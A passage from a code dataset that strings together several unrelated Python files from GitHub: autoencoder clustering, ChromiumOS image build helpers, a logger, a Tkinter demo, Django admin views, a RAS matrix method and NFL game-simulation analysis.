sklearn.cluster import DBSCAN\n\n\nclass AutoencoderTSNE:\n def __init__(\n self,\n *,\n gpu=0,\n model=None,\n learning_rate=0.001,\n weight_decay=0.01,\n lambda_kl=0.05,\n n_iter=5000,\n algo_clustering=DBSCAN(eps=0.3, min_samples=7),\n batch_size=500,\n nb_batches=10,\n distance_trajectory=\"euclidean\",\n ):\n # for now use the gpu 0 by default\n # TODO: handle the no gpu available case\n assert gpu is not None\n self.gpu = gpu\n self.model = model\n self.lr = learning_rate\n self.weight_decay = weight_decay\n self.lambda_kl = lambda_kl\n self.algo_clustering = algo_clustering\n self.n_iter = n_iter\n self.distance_trajectory = distance_trajectory\n self.is_trained = False\n self.reco_err, self.kls = [], []\n self.batch_size = batch_size\n self.nb_batches = nb_batches\n self.X = None\n self.hash_X = None\n\n def fit(self, X):\n h_X = hash(X.tobytes())\n if h_X != self.hash_X:\n self.X = X\n self.hash_X = h_X\n self.train(X)\n\n v = Variable(from_numpy(X.astype(np.float32)))\n lat = self.model.encoder(v.cpu()).detach().numpy()\n self.labels_ = self.algo_clustering.fit_predict(lat)\n\n def to_pickle(self, filename):\n \"\"\"Save the current AutoencoderTSNE in a pickle file named 'filename'\n \"\"\"\n with open(filename, \"wb\") as f:\n pickle.dump(self, f)\n\n @classmethod\n def from_file(cls, filename):\n \"\"\"Load a file from pickle\n \"\"\"\n with open(filename, \"rb\") as f:\n return pickle.load(f)\n\n def score_samples(self, X):\n \"\"\"Returns a numpy array containing the reconstruction error associated with each flight\n \"\"\"\n v = Variable(from_numpy(X.astype(np.float32)))\n output = self.model(v)\n return nn.MSELoss(reduction=\"none\")(output, v).sum(1).detach().numpy()\n\n def train(self, X):\n dim_input = batch.shape[1]\n # if network's architecture not specified, use (n, n/2, 5)\n if self.model is None:\n self.model = Autoencoder((dim_input, dim_input // 2, 2))\n\n self.model.cuda(self.gpu)\n # dirty hack\n model_dim_input = next(self.model.parameters()).size()[1]\n assert model_dim_input == dim_input\n optimizer = torch.optim.Adam(\n self.model.parameters(), lr=self.lr, weight_decay=self.weight_decay\n )\n criterion = nn.MSELoss()\n\n for _ in tqdm(range(self.nb_batches)):\n idx = np.random.randint(len(X), size=self.batch_size)\n batch = X[idx, :]\n P = (\n torch.tensor(make_P(batch, metric=self.distance_trajectory))\n .float()\n .cuda(self.gpu)\n )\n\n v = Variable(from_numpy(batch.astype(np.float32))).cuda(self.gpu)\n for epoch in range(self.n_iter):\n\n lat = self.model.encoder(v)\n output = self.model.decoder(lat)\n\n dist = criterion(output, v)\n kl = kl_divergence(lat, P, self.gpu)\n loss = dist + self.lambda_kl * kl\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n self.reco_err.append(dist.item())\n self.kls.append(kl.item())\n\n # disable gpu after training\n self.model.cpu()\n self.is_trained = True\n","repo_name":"ViryBe/artefact","sub_path":"artefact/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"37368540471","text":"from __future__ import print_function\n\nimport os\n\nfrom chromite.lib import constants\nfrom chromite.lib import cros_build_lib\nfrom chromite.lib import image_lib\nfrom chromite.lib import osutils\nfrom chromite.lib import path_util\nfrom chromite.lib import portage_util\n\n\nPARALLEL_EMERGE_STATUS_FILE_NAME = 'status_file'\n\n\nclass Error(Exception):\n \"\"\"Base module error.\"\"\"\n\nclass InvalidArgumentError(Exception):\n \"\"\"Invalid argument values.\"\"\"\n\n\nclass BuildConfig(object):\n \"\"\"Value object to hold the build configuration options.\"\"\"\n\n def __init__(self, builder_path=None, disk_layout=None,\n enable_rootfs_verification=True, replace=False, version=None):\n \"\"\"Build config initialization.\n\n Args:\n builder_path (str): The value to which the builder path lsb key should be\n set, the build_name installed on DUT during hwtest.\n disk_layout (str): The disk layout type.\n enable_rootfs_verification (bool): Whether the rootfs verification is\n enabled.\n replace (bool): Whether to replace existing output if any exists.\n version (str): The version string to use for the image.\n \"\"\"\n self.builder_path = builder_path\n self.disk_layout = disk_layout\n self.enable_rootfs_verification = enable_rootfs_verification\n self.replace = replace\n self.version = version\n\n def GetArguments(self):\n \"\"\"Get the build_image arguments for the configuration.\"\"\"\n args = []\n\n if self.builder_path:\n args.extend(['--builder_path', self.builder_path])\n if self.disk_layout:\n args.extend(['--disk_layout', self.disk_layout])\n if not self.enable_rootfs_verification:\n args.append('--noenable_rootfs_verification')\n if self.replace:\n args.append('--replace')\n if self.version:\n args.extend(['--version', self.version])\n\n return args\n\n\nclass BuildResult(object):\n \"\"\"Value object to report build image results.\"\"\"\n\n def __init__(self, return_code, failed_packages):\n \"\"\"Init method.\n\n Args:\n return_code (int): The build return code.\n failed_packages (list[str]): A list of failed packages as strings.\n \"\"\"\n self.failed_packages = []\n for package in failed_packages or []:\n self.failed_packages.append(portage_util.SplitCPV(package, strict=False))\n\n # The return code should always be non-zero if there's any failed packages,\n # but it's cheap insurance, so check it.\n self.success = return_code == 0 and not self.failed_packages\n\n\ndef Build(board=None, images=None, config=None):\n \"\"\"Build an image.\n\n Args:\n board (str): The board name.\n images (list): The image types to build.\n config (BuildConfig): The build configuration options.\n\n Returns:\n BuildResult\n \"\"\"\n board = board or cros_build_lib.GetDefaultBoard()\n if not board:\n raise InvalidArgumentError('board is required.')\n images = images or [constants.IMAGE_TYPE_BASE]\n config = config or BuildConfig()\n\n if cros_build_lib.IsInsideChroot():\n cmd = [os.path.join(constants.CROSUTILS_DIR, 'build_image')]\n else:\n cmd = ['./build_image']\n\n cmd.extend(['--board', board])\n cmd.extend(config.GetArguments())\n cmd.extend(images)\n\n with osutils.TempDir() as tempdir:\n status_file = os.path.join(tempdir, PARALLEL_EMERGE_STATUS_FILE_NAME)\n extra_env = {constants.PARALLEL_EMERGE_STATUS_FILE_ENVVAR: status_file}\n result = cros_build_lib.RunCommand(cmd, enter_chroot=True,\n error_code_ok=True, extra_env=extra_env)\n\n try:\n content = osutils.ReadFile(status_file).strip()\n except IOError:\n # No file means no packages.\n failed = None\n else:\n failed = content.split() if content else None\n\n return BuildResult(result.returncode, failed)\n\n\ndef Test(board, result_directory, image_dir=None):\n \"\"\"Run tests on an already built image.\n\n Currently this is just running test_image.\n\n Args:\n board (str): The board name.\n result_directory (str): Root directory where the results should be stored\n relative to the chroot.\n image_dir (str): The path to the image. Uses the board's default image\n build path when not provided.\n\n Returns:\n bool - True if all tests passed, False otherwise.\n \"\"\"\n if not board:\n raise InvalidArgumentError('Board is required.')\n if not result_directory:\n raise InvalidArgumentError('Result directory required.')\n\n if not image_dir:\n # We can build the path to the latest image directory.\n image_dir = image_lib.GetLatestImageLink(board, force_chroot=True)\n elif not cros_build_lib.IsInsideChroot() and os.path.exists(image_dir):\n # Outside chroot with outside chroot path--we need to convert it.\n image_dir = path_util.ToChrootPath(image_dir)\n\n cmd = [\n os.path.join(constants.CHROOT_SOURCE_ROOT, constants.CHROMITE_BIN_SUBDIR,\n 'test_image'),\n '--board', board,\n '--test_results_root', result_directory,\n image_dir,\n ]\n\n result = cros_build_lib.SudoRunCommand(cmd, enter_chroot=True,\n error_code_ok=True)\n\n return result.returncode == 0\n","repo_name":"qinjidong/easy75","sub_path":"src/third_party/chromite/service/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":5093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73329578167","text":"import time\n\nERROR = 1\nWARN = 3\nINFO = 5\nDEBUG = 7\nLEVEL = INFO\nLOGFILE = None\nINIT = False\n\ndef init(outfile, level=INFO):\n\tglobal LOGFILE, INIT, LEVEL\n\tLEVEL = level\n\tLOGFILE = open(outfile, 'w')\n\tINIT = True\n\tdebug('logfile initiated')\n\ndef writelog(msg, level):\n\tglobal LOGFILE, INIT, LEVEL\n\t\n\tif level <= LEVEL:\n\t\tprint(msg)\n\t\tif INIT:\n\t\t\ttry:\n\t\t\t\tLOGFILE.write(msg + '\\n')\n\t\t\texcept:\n\t\t\t\tprint(msg)\n\ndef levelcode(level):\n\tif level == 1:\n\t\treturn 'ERROR'\n\tif level == 3:\n\t\treturn 'WARN'\n\tif level == 5:\n\t\treturn 'INFO'\n\tif level == 7:\n\t\treturn 'DEBUG'\n\treturn 'LOG'\n\t\t\ndef error(msg, function=''):\n\tlog(msg, function, ERROR)\ndef warn(msg, function=''):\n\tlog(msg, function, WARN)\ndef info(msg, function=''):\n\tlog(msg, function, INFO)\ndef debug(msg, function=''):\n\tlog(msg, function, DEBUG)\ndef log(msg, function='', level=0):\n\tif level == 0:\n\t\tlevel = INFO\n\tif function != '':\n\t\tfunction += '()'\n\tnow = time.time()\n\twritelog('%s %s:%s - %s' % (now,function,levelcode(level),msg), level)\n\t\ndef end():\n\tglobal LOGFILE, INIT\n\tif INIT:\n\t\tLOGFILE.close()\n\t\ndef __del__():\n\tglobal LOGFILE, INIT\n\tif INIT:\n\t\tLOGFILE.close()","repo_name":"computeythings/Switchlist","sub_path":"switch_src/Logging.py","file_name":"Logging.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10469877400","text":"#Continuation from Menu bar\n#Displays image and text\n\nfrom tkinter import *\nfrom PIL import Image, ImageTk\nclass Window(Frame):\n\n def __init__(self, master = None):\n Frame.__init__(self, master)\n\n self.master = master\n\n self.init_window()\n\n def init_window(self):\n self.master.title(\"GUI\")\n \n self.pack(fill=BOTH, expand = 1)\n menu = Menu(self.master)\n self.master.config(menu=menu)\n\n file = Menu(menu)\n file.add_command(label=\"Exit\", command=self.client_exit)\n file.add_command(label=\"Save\")\n menu.add_cascade(label=\"File\", menu=file)\n\n edit = Menu(menu)\n #Add empty parameters from self.showImg and self.showTxt\n #this initializes it immediately\n edit.add_command(label='Show Image', command=self.showImg)\n edit.add_command(label='Show Text', command=self.showTxt)\n\n menu.add_cascade(label='Edit', menu=edit)\n \n def client_exit(self):\n exit()\n\n def showImg(self):\n #Image from PIL\n load = Image.open('sampleImage.jpg')\n render = ImageTk.PhotoImage(load)\n\n img = Label(self, image=render)\n img.image = render\n img.place(x=0,y=0)\n\n def showTxt(self):\n text = Label(self, text=\"Twice x Once\")\n text.pack()\n \nroot = Tk()\n#Initial Window size\nroot.geometry(\"400x300\")\n\napp = Window(root)\n#Initializes and displays it\nroot.mainloop()\n","repo_name":"NathanJiangCS/Exploring-Python","sub_path":"Tkinter/Images and Text.py","file_name":"Images and Text.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"75115815289","text":"# Bonus Work #2: SOLO LEARN ACTIVITY (SEARCH ENGINE) - 12/10/22\n\n# Write a program that takes a text and a word as input and passes them to a function called search().\n# The search() function should return \"Word found\" if the word is present in the text, \n# or \"Word not found\", if it's not.\n\ndef search(text, word):\n if word in text:\n print(\"\\n> Word found!\")\n else:\n print(\"\\n> Word not found!\")\n\nprint(\"\\n-----Function: Search Engine-----\\n\")\ntext = input(\"Enter text: \")\nword = input(\"Enter word: \")\nsearch(text, word)\nprint()","repo_name":"Code-Lab-1/programming-skills-portfolio-psjasmin","sub_path":"Chapter 7- Functions/Exercises/Bonus Work_2.py","file_name":"Bonus Work_2.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15302400596","text":"import json\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom airline_app.models import Users\n\n\n@api_view(['GET'])\ndef get_users(request):\n if request.session.get('user_e_mail') is not None and request.session.get('user_role') == 1:\n users = Users.objects.all()\n json_users = {'users': []}\n for user in users:\n confirmed = \"N\"\n if user.confirmed:\n confirmed = \"Y\"\n temp = {'name': user.name, 'surname': user.surname, 'e_mail': user.e_mail, 'role': user.id_role.role,\n 'id': user.id, 'confirmed': confirmed}\n json_users['users'].append(temp)\n return HttpResponse(json.dumps(json_users), content_type='application/json',\n status=status.HTTP_200_OK)\n else:\n return HttpResponse('error login', status=status.HTTP_401_UNAUTHORIZED)\n\n\n@csrf_exempt\n@api_view(['DELETE'])\ndef delete_user(request, u_id):\n if request.session.get('user_e_mail') is not None and request.session.get('user_role') == 1:\n user = Users.objects.filter(id=u_id).first()\n user.delete()\n return HttpResponse('ok', status=status.HTTP_200_OK)\n else:\n return HttpResponse('error login', status=status.HTTP_401_UNAUTHORIZED)\n\n\n@csrf_exempt\n@api_view(['GET', 'POST'])\ndef confirm_user(request, u_id):\n if request.session.get('user_e_mail') is not None and request.session.get('user_role') == 1:\n user = Users.objects.filter(id=u_id).first()\n user.confirmed = True\n user.save()\n return HttpResponse('ok', status=status.HTTP_200_OK)\n else:\n return HttpResponse('error login', status=status.HTTP_401_UNAUTHORIZED)\n","repo_name":"morozvolodymyr-zz/airline","sub_path":"airline_app/admin_users_list_view.py","file_name":"admin_users_list_view.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70998218168","text":"import datetime\n\nSOURCE = 0\nWATER_LEVEL = 0\nPREVIOUS_ADC = 0\nNO_INPUT_START = None\ndata = []\n\n\ndef tank_monitor(adc):\n global SOURCE\n global WATER_LEVEL\n global PREVIOUS_ADC\n global NO_INPUT_START\n\n time_now = datetime.datetime.now()\n adc_level = adc\n if adc_level < 100:\n adc_level = 0\n\n if NO_INPUT_START:\n print(\n f\"\\n0 adc:{adc_level} PREVIOUS:{PREVIOUS_ADC} NO_INPUT:{NO_INPUT_START.strftime('%H:%M:%S')} SOURCE:{SOURCE} WATER_LEVEL:{WATER_LEVEL}\"\n )\n else:\n print(\n f\"\\n0 adc:{adc_level} PREVIOUS:{PREVIOUS_ADC} NO_INPUT:{NO_INPUT_START} SOURCE:{SOURCE} WATER_LEVEL:{WATER_LEVEL}\"\n )\n # level_rate = pv.WATER_LEVEL_rate(adc_level)\n orig_level = adc_level #pv.WATER_LEVEL\n\n if not (PREVIOUS_ADC and NO_INPUT_START): # 초기화가 필요한 경우\n PREVIOUS_ADC = adc_level\n NO_INPUT_START = time_now\n\n print(\n f\"1 adc:{adc_level} PREVIOUS:{PREVIOUS_ADC} NO_INPUT:{NO_INPUT_START.strftime('%H:%M:%S')} SOURCE:{SOURCE} WATER_LEVEL:{WATER_LEVEL}\"\n )\n # 수위 입력이 없음\n if abs(adc_level - PREVIOUS_ADC) < 30:\n td = time_now - NO_INPUT_START\n print(f\"NO INPUT 0: td.seconds:{td.seconds} Tolerance:{30}\")\n if (td.seconds >= 30): # 일정 시간 입력이 없으면\n print(f\"NO INPUT 1: td.seconds:{td.seconds} Tolerance:{30}\")\n if SOURCE == 0:\n SOURCE = 1\n print(f\"RUN_MODE:{SOURCE}\")\n if len(data) > 5:\n WATER_LEVEL = adc_level + 10000\n print(f\"##### Predicted level: {WATER_LEVEL}\")\n else:\n print(\"###### Training failed. returning original value\")\n WATER_LEVEL = orig_level\n # get prediction from ML model\n print(f\"2 SOURCE:{SOURCE} WATER_LEVEL:{WATER_LEVEL}\")\n\n else:\n print(f\"NO INPUT 2: td.seconds:{td.seconds} Tolerance:{30}\")\n WATER_LEVEL = orig_level # 일시적인 현상으로 간주하고 level 값 버림\n print(f\"3 SOURCE:{SOURCE} WATER_LEVEL:{WATER_LEVEL}\")\n else: # 수위 입력이 있음\n # 예측모드에서 수위계모드로 변경\n if SOURCE == 1:\n SOURCE = 0\n print(f\"4 SOURCE:{SOURCE} WATER_LEVEL:{WATER_LEVEL}\")\n print(f\"RUN_MODE:{SOURCE}\")\n\n PREVIOUS_ADC = adc_level\n NO_INPUT_START = time_now\n WATER_LEVEL = adc_level\n\n append_data([time_now.strftime(\"%Y-%m-%d %H:%M:%S\"), WATER_LEVEL, SOURCE])\n print(\n f\"5 adc:{adc_level} PREVIOUS:{PREVIOUS_ADC} NO_INPUT:{NO_INPUT_START.strftime('%H:%M:%S')} SOURCE:{SOURCE} WATER_LEVEL:{WATER_LEVEL}\"\n )\n\n\ndef append_data(l):\n data.append(l)","repo_name":"iryek-rpi/rpi-pump","sub_path":"Test/logic/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24694637862","text":"class Nodo(object):\n def __init__(self, nombre, vecinos = None):\n self.nombre = nombre\n self.vecinos = [] if vecinos is None else vecinos\n self.distancias = {}\n self.mensajes = []\n \n def addVecino(self, vecino, distancia = 0):\n self.vecinos.append(vecino)\n self.distancias[vecino.nombre] = distancia\n vecino.distancias[self.nombre] = distancia\n \n def paquete(self, type, headers, payload):\n\n paquete = {\n \"type\": type,\n \"headers\": headers,\n \"payload\": payload\n }\n\n if paquete not in self.mensajes:\n self.mensajes.append(paquete)\n return paquete\n \n def __repr__(self):\n vecinos_nombres = [vecino.nombre for vecino in self.vecinos]\n return \" Nodo: \" + str(self.nombre) + \" Vecinos: \" + str(vecinos_nombres) + \" Distancias: \" + str(self.distancias)","repo_name":"JuanDiegoAvila/Lab3_Redes","sub_path":"nodo.py","file_name":"nodo.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43692674051","text":"import transaction\nfrom ftw.builder import Builder, create\nfrom ftw.contentpage.testing import FTW_CONTENTPAGE_FUNCTIONAL_TESTING\nfrom ftw.testbrowser import browsing\nfrom plone.registry.interfaces import IRegistry\nfrom unittest import TestCase\nfrom zope.component import getUtility\n\n\nclass TestListingBlockTableHelper(TestCase):\n\n layer = FTW_CONTENTPAGE_FUNCTIONAL_TESTING\n\n def setUp(self):\n content_page = create(Builder('content page'))\n self.listing_block = create(Builder('listing block').within(content_page))\n self.file_ = create(Builder('file')\n .with_dummy_content()\n .having(description='S\\xc3\\xb6me description')\n .within(self.listing_block))\n\n @browsing\n def test_file_link_default_value(self, browser):\n browser.login().visit(self.listing_block, view='block_view')\n self.assertEquals(\n self.file_.absolute_url() + '/download',\n browser.css('.linkWrapper a').first.attrib['href']\n )\n\n @browsing\n def test_file_link_empty_registry_value_without_trailing_slash(self, browser):\n registry = getUtility(IRegistry)\n registry['ftw.contentpage.listingblock.defaultfileviewname'] = u''\n transaction.commit()\n\n browser.login().visit(self.listing_block, view='block_view')\n self.assertEquals(\n self.file_.absolute_url(),\n browser.css('.linkWrapper a').first.attrib['href']\n )\n\n @browsing\n def test_file_link_changed_registry_value(self, browser):\n registry = getUtility(IRegistry)\n registry['ftw.contentpage.listingblock.defaultfileviewname'] = u'some-viewname'\n transaction.commit()\n\n browser.login().visit(self.listing_block, view='block_view')\n self.assertEquals(\n self.file_.absolute_url() + '/some-viewname',\n browser.css('.linkWrapper a').first.attrib['href']\n )\n","repo_name":"4teamwork/ftw.contentpage","sub_path":"ftw/contentpage/tests/test_listingblock_table_helper.py","file_name":"test_listingblock_table_helper.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"6576971275","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/9/23\n# @Author : github.com/xfLee\n\nimport numpy as np\n\nclass RAS(object):\n def __init__(self, A0, X1, u1, v1, epsilon, revisedElements):\n self.A0 = A0\n self.X1 = X1\n self.u1 = u1\n self.v1 = v1\n self.i = np.ones((1, A0.shape[0]))\n self.epsilon = epsilon\n self.revisedElements = revisedElements\n\n def revise(self):\n for idx, val in self.revisedElements.items():\n self.A0[idx] = 0\n self.X1[idx[0], idx[0]] -= val\n self.u1[idx[0]] -= val\n self.v1[idx[1]] -= val\n\n def run(self):\n Zk = np.dot(self.A0, self.X1)\n uk = np.dot(self.i, np.transpose(Zk))\n vk = np.dot(self.i, Zk)\n k = 1\n\n R = np.diag(self.u1 * (1 / uk))\n S = np.diag(self.v1 * (1 / vk))\n\n u1, v1 = self.u1, self.v1\n\n while sum(abs(u1 - uk)) >= self.epsilon or sum(abs(v1 - vk)) >= self.epsilon:\n Rk = u1 * (1 / uk)\n Zk = np.dot(np.diag(Rk), Zk)\n\n u1 = np.dot(self.i, np.transpose(Zk))\n vk = np.dot(self.i, Zk)\n\n Sk = v1 * (1 / vk)\n Zk = np.dot(Zk, np.diag(Sk))\n\n uk = np.dot(self.i, np.transpose(Zk))\n v1 = np.dot(self.i, Zk)\n\n if k == 1:\n R = np.diag(Rk)\n S = np.diag(Sk)\n else:\n R = np.dot(np.diag(Rk), R)\n S = np.dot(np.diag(Sk), S)\n k += 1\n\n Z2n = np.dot(np.dot(np.dot(R, self.A0), self.X1), S)\n A1 = np.dot(np.dot(R, self.A0), S)\n\n for idx, val in self.revisedElements.items():\n Z2n[idx] = val\n A1[idx] = val / (self.X1[idx[0], idx[0]] + val)\n\n return k, A1, Z2n, R, S\n\ndef test():\n Z0 = np.array([[0, 120, 40],\n [90, 60, 90],\n [60, 40, 100]])\n X0 = np.array([300, 400, 500])\n A0 = np.dot(Z0, np.linalg.inv(np.diag(X0)))\n X1 = np.diag([400, 500, 600])\n u1 = np.array([180, 330, 220])\n v1 = np.array([200, 240, 290])\n epsilon = 0.01\n revisedElements = {(1, 1): 75}\n ras = RAS(A0, X1, u1, v1, epsilon, revisedElements)\n ras.revise()\n k, A1, Z2n, R, S = ras.run()\n print(\"1.修正RAS法计算过程循环次数:\" + str(k - 1))\n print(\"2.修正RAS法估计的目标年直接消耗系数矩阵A1:\")\n print(A1)\n print(\"3.修正RAS法估计的目标年消耗矩阵A1*X1:\")\n print(Z2n)\n print(\"4.修正RAS法估计的目标年R矩阵:\")\n print(R)\n print(\"5.修正RAS法估计的目标年S矩阵:\")\n print(S)\n\n# if __name__ == \"main\":\ntest()","repo_name":"xfLee/IOtools","sub_path":"revisedRAS.py","file_name":"revisedRAS.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"26369942963","text":"from os import listdir\nfrom os.path import isfile, join\nimport pickle\nfrom mass_simulate_compare_odds import add_to_running_dict_df, extract_info, get_predicted_win_loss, load_odds_history_df\nimport statistics as stat\nimport statsmodels as sm\nfrom math import sqrt\n\ndef get_all_file_paths(base_path='results_save'):\n return [join(base_path, f) for f in listdir(base_path) if isfile(join(base_path, f))]\n\ndef load_file_for_oddsrow(odds_row, excl_vs_before=True, n_sims=258):\n if excl_vs_before:\n excl_str = '_excl'\n else:\n excl_str = ''\n H_team = odds_row['home']\n A_team = odds_row['away']\n fp_ = 'results_save\\\\yr.' + str(odds_row['year']) + '_wk.' + str(odds_row['week']) + excl_str + '_H.' + H_team + '_A.' + A_team + '_n.' + str(n_sims) + '_results.pkl'\n with open(fp_, 'rb') as file:\n final_data = pickle.load(file)\n return final_data\n\ndef apply_home_team_advantage(odds_row, home_mod, excl_vs_before=False, n_sims=258, percentile_break=.1):\n if excl_vs_before:\n excl_str = '_excl'\n else:\n excl_str = ''\n week = odds_row['week']\n\n H_team = odds_row['home']\n A_team = odds_row['away']\n fp_ = 'results_save\\\\yr.' + str(odds_row['year']) + '_wk.' + str(odds_row['week']) + excl_str + '_H.' + H_team + '_A.' + A_team + '_n.' + str(n_sims) + '_results.pkl'\n if not isfile(fp_):\n return\n with open(fp_, 'rb') as file:\n final_data = pickle.load(file)\n H_minus_A_history = final_data['H_minus_A_history']\n H_plus_A_history = final_data['H_plus_A_history']\n\n print('test:', H_minus_A_history)\n\n H_minus_A_history = [x + home_mod for x in H_minus_A_history]\n\n if odds_row['favorite'] == odds_row['home']:\n home_spread_open = odds_row['spread_open']\n home_spread_close = odds_row['spread_close']\n else:\n home_spread_open = -1*odds_row['spread_open']\n home_spread_close = -1*odds_row['spread_close']\n\n over_under_better_open, over_under_better_close, WL_better_than_vegas, better_ATS_open, better_ATS_close, AST_open_dif, AST_close_dif, OU_open_better_dif, OU_close_better_dif, final_total = \\\n extract_info(H_minus_A_history, H_plus_A_history, odds_row, home_spread_open, home_spread_close, percentile_break)\n\n if odds_row['final_real_home_minus_away'] > 0:\n H_win = 1\n elif odds_row['final_real_home_minus_away'] < 0:\n H_win = 0\n else:\n H_win = .5\n\n\n\n WL_better_than_vegas, p_dif_temp = get_predicted_win_loss(H_minus_A_history, odds_row['ML'], home_spread_close,\n odds_row['final_real_home_minus_away'])\n\n final_data = {'home': H_team, 'away': A_team,\n 'home_spread_open': home_spread_open, 'home_spread_close': home_spread_close,\n 'pred_spread_median': stat.median(H_minus_A_history), 'pred_spread_avg': stat.mean(H_minus_A_history),\n 'over_under_better_open': over_under_better_open, 'over_under_better_close': over_under_better_close,\n 'WL_better_vegas': WL_better_than_vegas, 'better_ATS_open': better_ATS_open,\n 'better_ATS_close': better_ATS_close, 'n_sims': n_sims, 'excl_vs_before': excl_vs_before,\n 'True_H_win': H_win, 'True_H_minus_A': odds_row['final_real_home_minus_away'], 'True_total_score': final_total,\n 'AST_open_dif': AST_open_dif, 'AST_close_dif': AST_close_dif,\n 'OU_open_better_dif': OU_open_better_dif, 'OU_close_better_dif': OU_close_better_dif, 'H_minus_A_history': H_minus_A_history,\n 'H_plus_A_history': H_plus_A_history}\n\n fp_out = 'results_save\\\\yr.' + str(odds_row['year']) + '_wk.' + str(odds_row['week']) + '_hm.' + str(home_mod) + excl_str + '_H.' + H_team + '_A.' + A_team + '_n.' + str(n_sims) + '_results.pkl'\n with open(fp_out, 'wb') as file:\n pickle.dump(final_data, file)\n\ndef update_home_mod(home_mod=2):\n print('Upating data. Home_mod =', 2)\n YEAR = 2019\n MAX_EFFECTIVE_TIME = 900\n odds_data_df = load_odds_history_df(YEAR)\n running_dict = {}\n HOME_MOD = 2\n for idx, row in odds_data_df.iterrows():\n apply_home_team_advantage(row, home_mod, n_sims=999)\n\ndef sim_season(year=2018, n_sims=258):\n YEAR = year\n odds_data_df = load_odds_history_df(YEAR)\n team_records = {}\n for idx, odds_row in odds_data_df.iterrows():\n week = odds_row['week']\n if False:\n if YEAR == 2019:\n if week < 3 or week == 15 or week == 17:\n continue\n elif YEAR == 2018:\n if week in [3, 4, 8, 12, 14, 15, 16, 17]:\n continue\n H_team = odds_row['home']\n A_team = odds_row['away']\n for team in [H_team, A_team]:\n if team not in team_records:\n team_records[team] = 0\n week_data = load_file_for_oddsrow(odds_row, excl_vs_before=True, n_sims=n_sims)\n if YEAR == 2019:\n n_home_wins = 0\n n_home_losses = 0\n for game_plus_minus in week_data['H_minus_A_history']:\n if game_plus_minus > 0:\n n_home_wins += 1\n elif game_plus_minus < 0:\n n_home_losses += 1\n p_home_win = n_home_wins / (n_home_wins + n_home_losses)\n else:\n p_home_win = week_data['p_home_win'] / (week_data['p_home_win'] + week_data['p_away_win'])\n team_records[H_team] += p_home_win\n team_records[A_team] += 1 - p_home_win\n print('records:')\n print(team_records)\n\n sorted_records = {k: v for k, v in sorted(team_records.items(), key=lambda item: item[1])}\n print(sorted_records)\n team_actual_records_2019 = {'CIN': 2, 'MIA': 5, 'WAS': 3, 'NYG': 4, 'CAR': 5, 'JAX': 6, 'NYJ': 7, 'DET': 3, 'ARI': 5,\n 'IND': 7, 'ATL': 7, 'OAK': 7, 'CHI': 8, 'DEN': 7, 'CLE': 6, 'HOU': 10, 'SEA': 11, 'PIT': 8,\n 'PHI': 9, 'GB': 13, 'TEN': 9, 'BUF': 10, 'LAC': 5, 'LA': 9, 'MIN': 10, 'TB': 7, 'DAL': 8,\n 'NO': 13, 'BAL': 14, 'KC': 12, 'SF': 13, 'NE': 12}\n\n team_actual_records = team_actual_records_2019\n # HOU > BUF: Wrong\n # TIT > NE: Wrong\n # MIN > NO: Wrong\n # SEA > PHI: Wrong\n\n # 49 > MIN: Correct!\n # TIT > BAL: Wrong\n # KC > HOU: Correct!\n # GB > SEA: Wrong\n\n # KC > TIT: Correct!\n # 49 > GB: Correct!\n\n # HOU was the lowest at 17\n\n sum = 0\n difs = []\n actual = []\n sim = []\n for i, team in enumerate(sorted_records):\n print(32-i, '\\t', team, '\\t', round(sorted_records[team], 2), '\\t', team_actual_records[team], '\\t, dif:\\t', round(team_actual_records[team] - sorted_records[team], 2))\n dif = abs(team_actual_records[team] - sorted_records[team])\n actual.append(team_actual_records[team])\n sim.append(sorted_records[team])\n sum += sorted_records[team]\n difs.append(dif)\n print(stat.mean(difs))\n print(stat.mean(actual))\n print(stat.mean(sim))\n print('Mean dif:', round(stat.mean(difs), 3))\n print('RMSE:', sqrt(stat.mean([dif * dif for dif in difs])))\n\ndef create_max_num_fp():\n file_paths = get_all_file_paths()\n fp_inits = {}\n fp_n = {}\n for fp in file_paths:\n fp_initial = fp.split('_n.')[0]\n num_runs = int(fp.split('_n.')[1][0:3])\n if fp_initial not in fp_inits:\n with open(fp, 'rb') as file:\n data = pickle.load(file)\n fp_inits[fp_initial] = data\n fp_n[fp_initial] = num_runs\n\n if num_runs > fp_n[fp_initial]:\n with open(fp, 'rb') as file:\n data = pickle.load(file)\n fp_inits[fp_initial] = data\n fp_n[fp_initial] = num_runs\n\n for fp_initial in fp_inits:\n new_fn = fp_initial + '_n.999_results.pkl'\n with open(new_fn, 'wb') as file:\n pickle.dump(fp_inits[fp_initial], file)\n\n\ndef analyze_fp():\n file_paths = get_all_file_paths()\n running_dict = {}\n for fp in file_paths:\n # if 'excl' in fp:\n # continue\n # if 'wk.12' not in fp:\n # continue\n\n skip = True\n for wk in range(1, 11):\n if 'wk.' + str(wk) + '_' in fp:\n skip = False\n\n #if 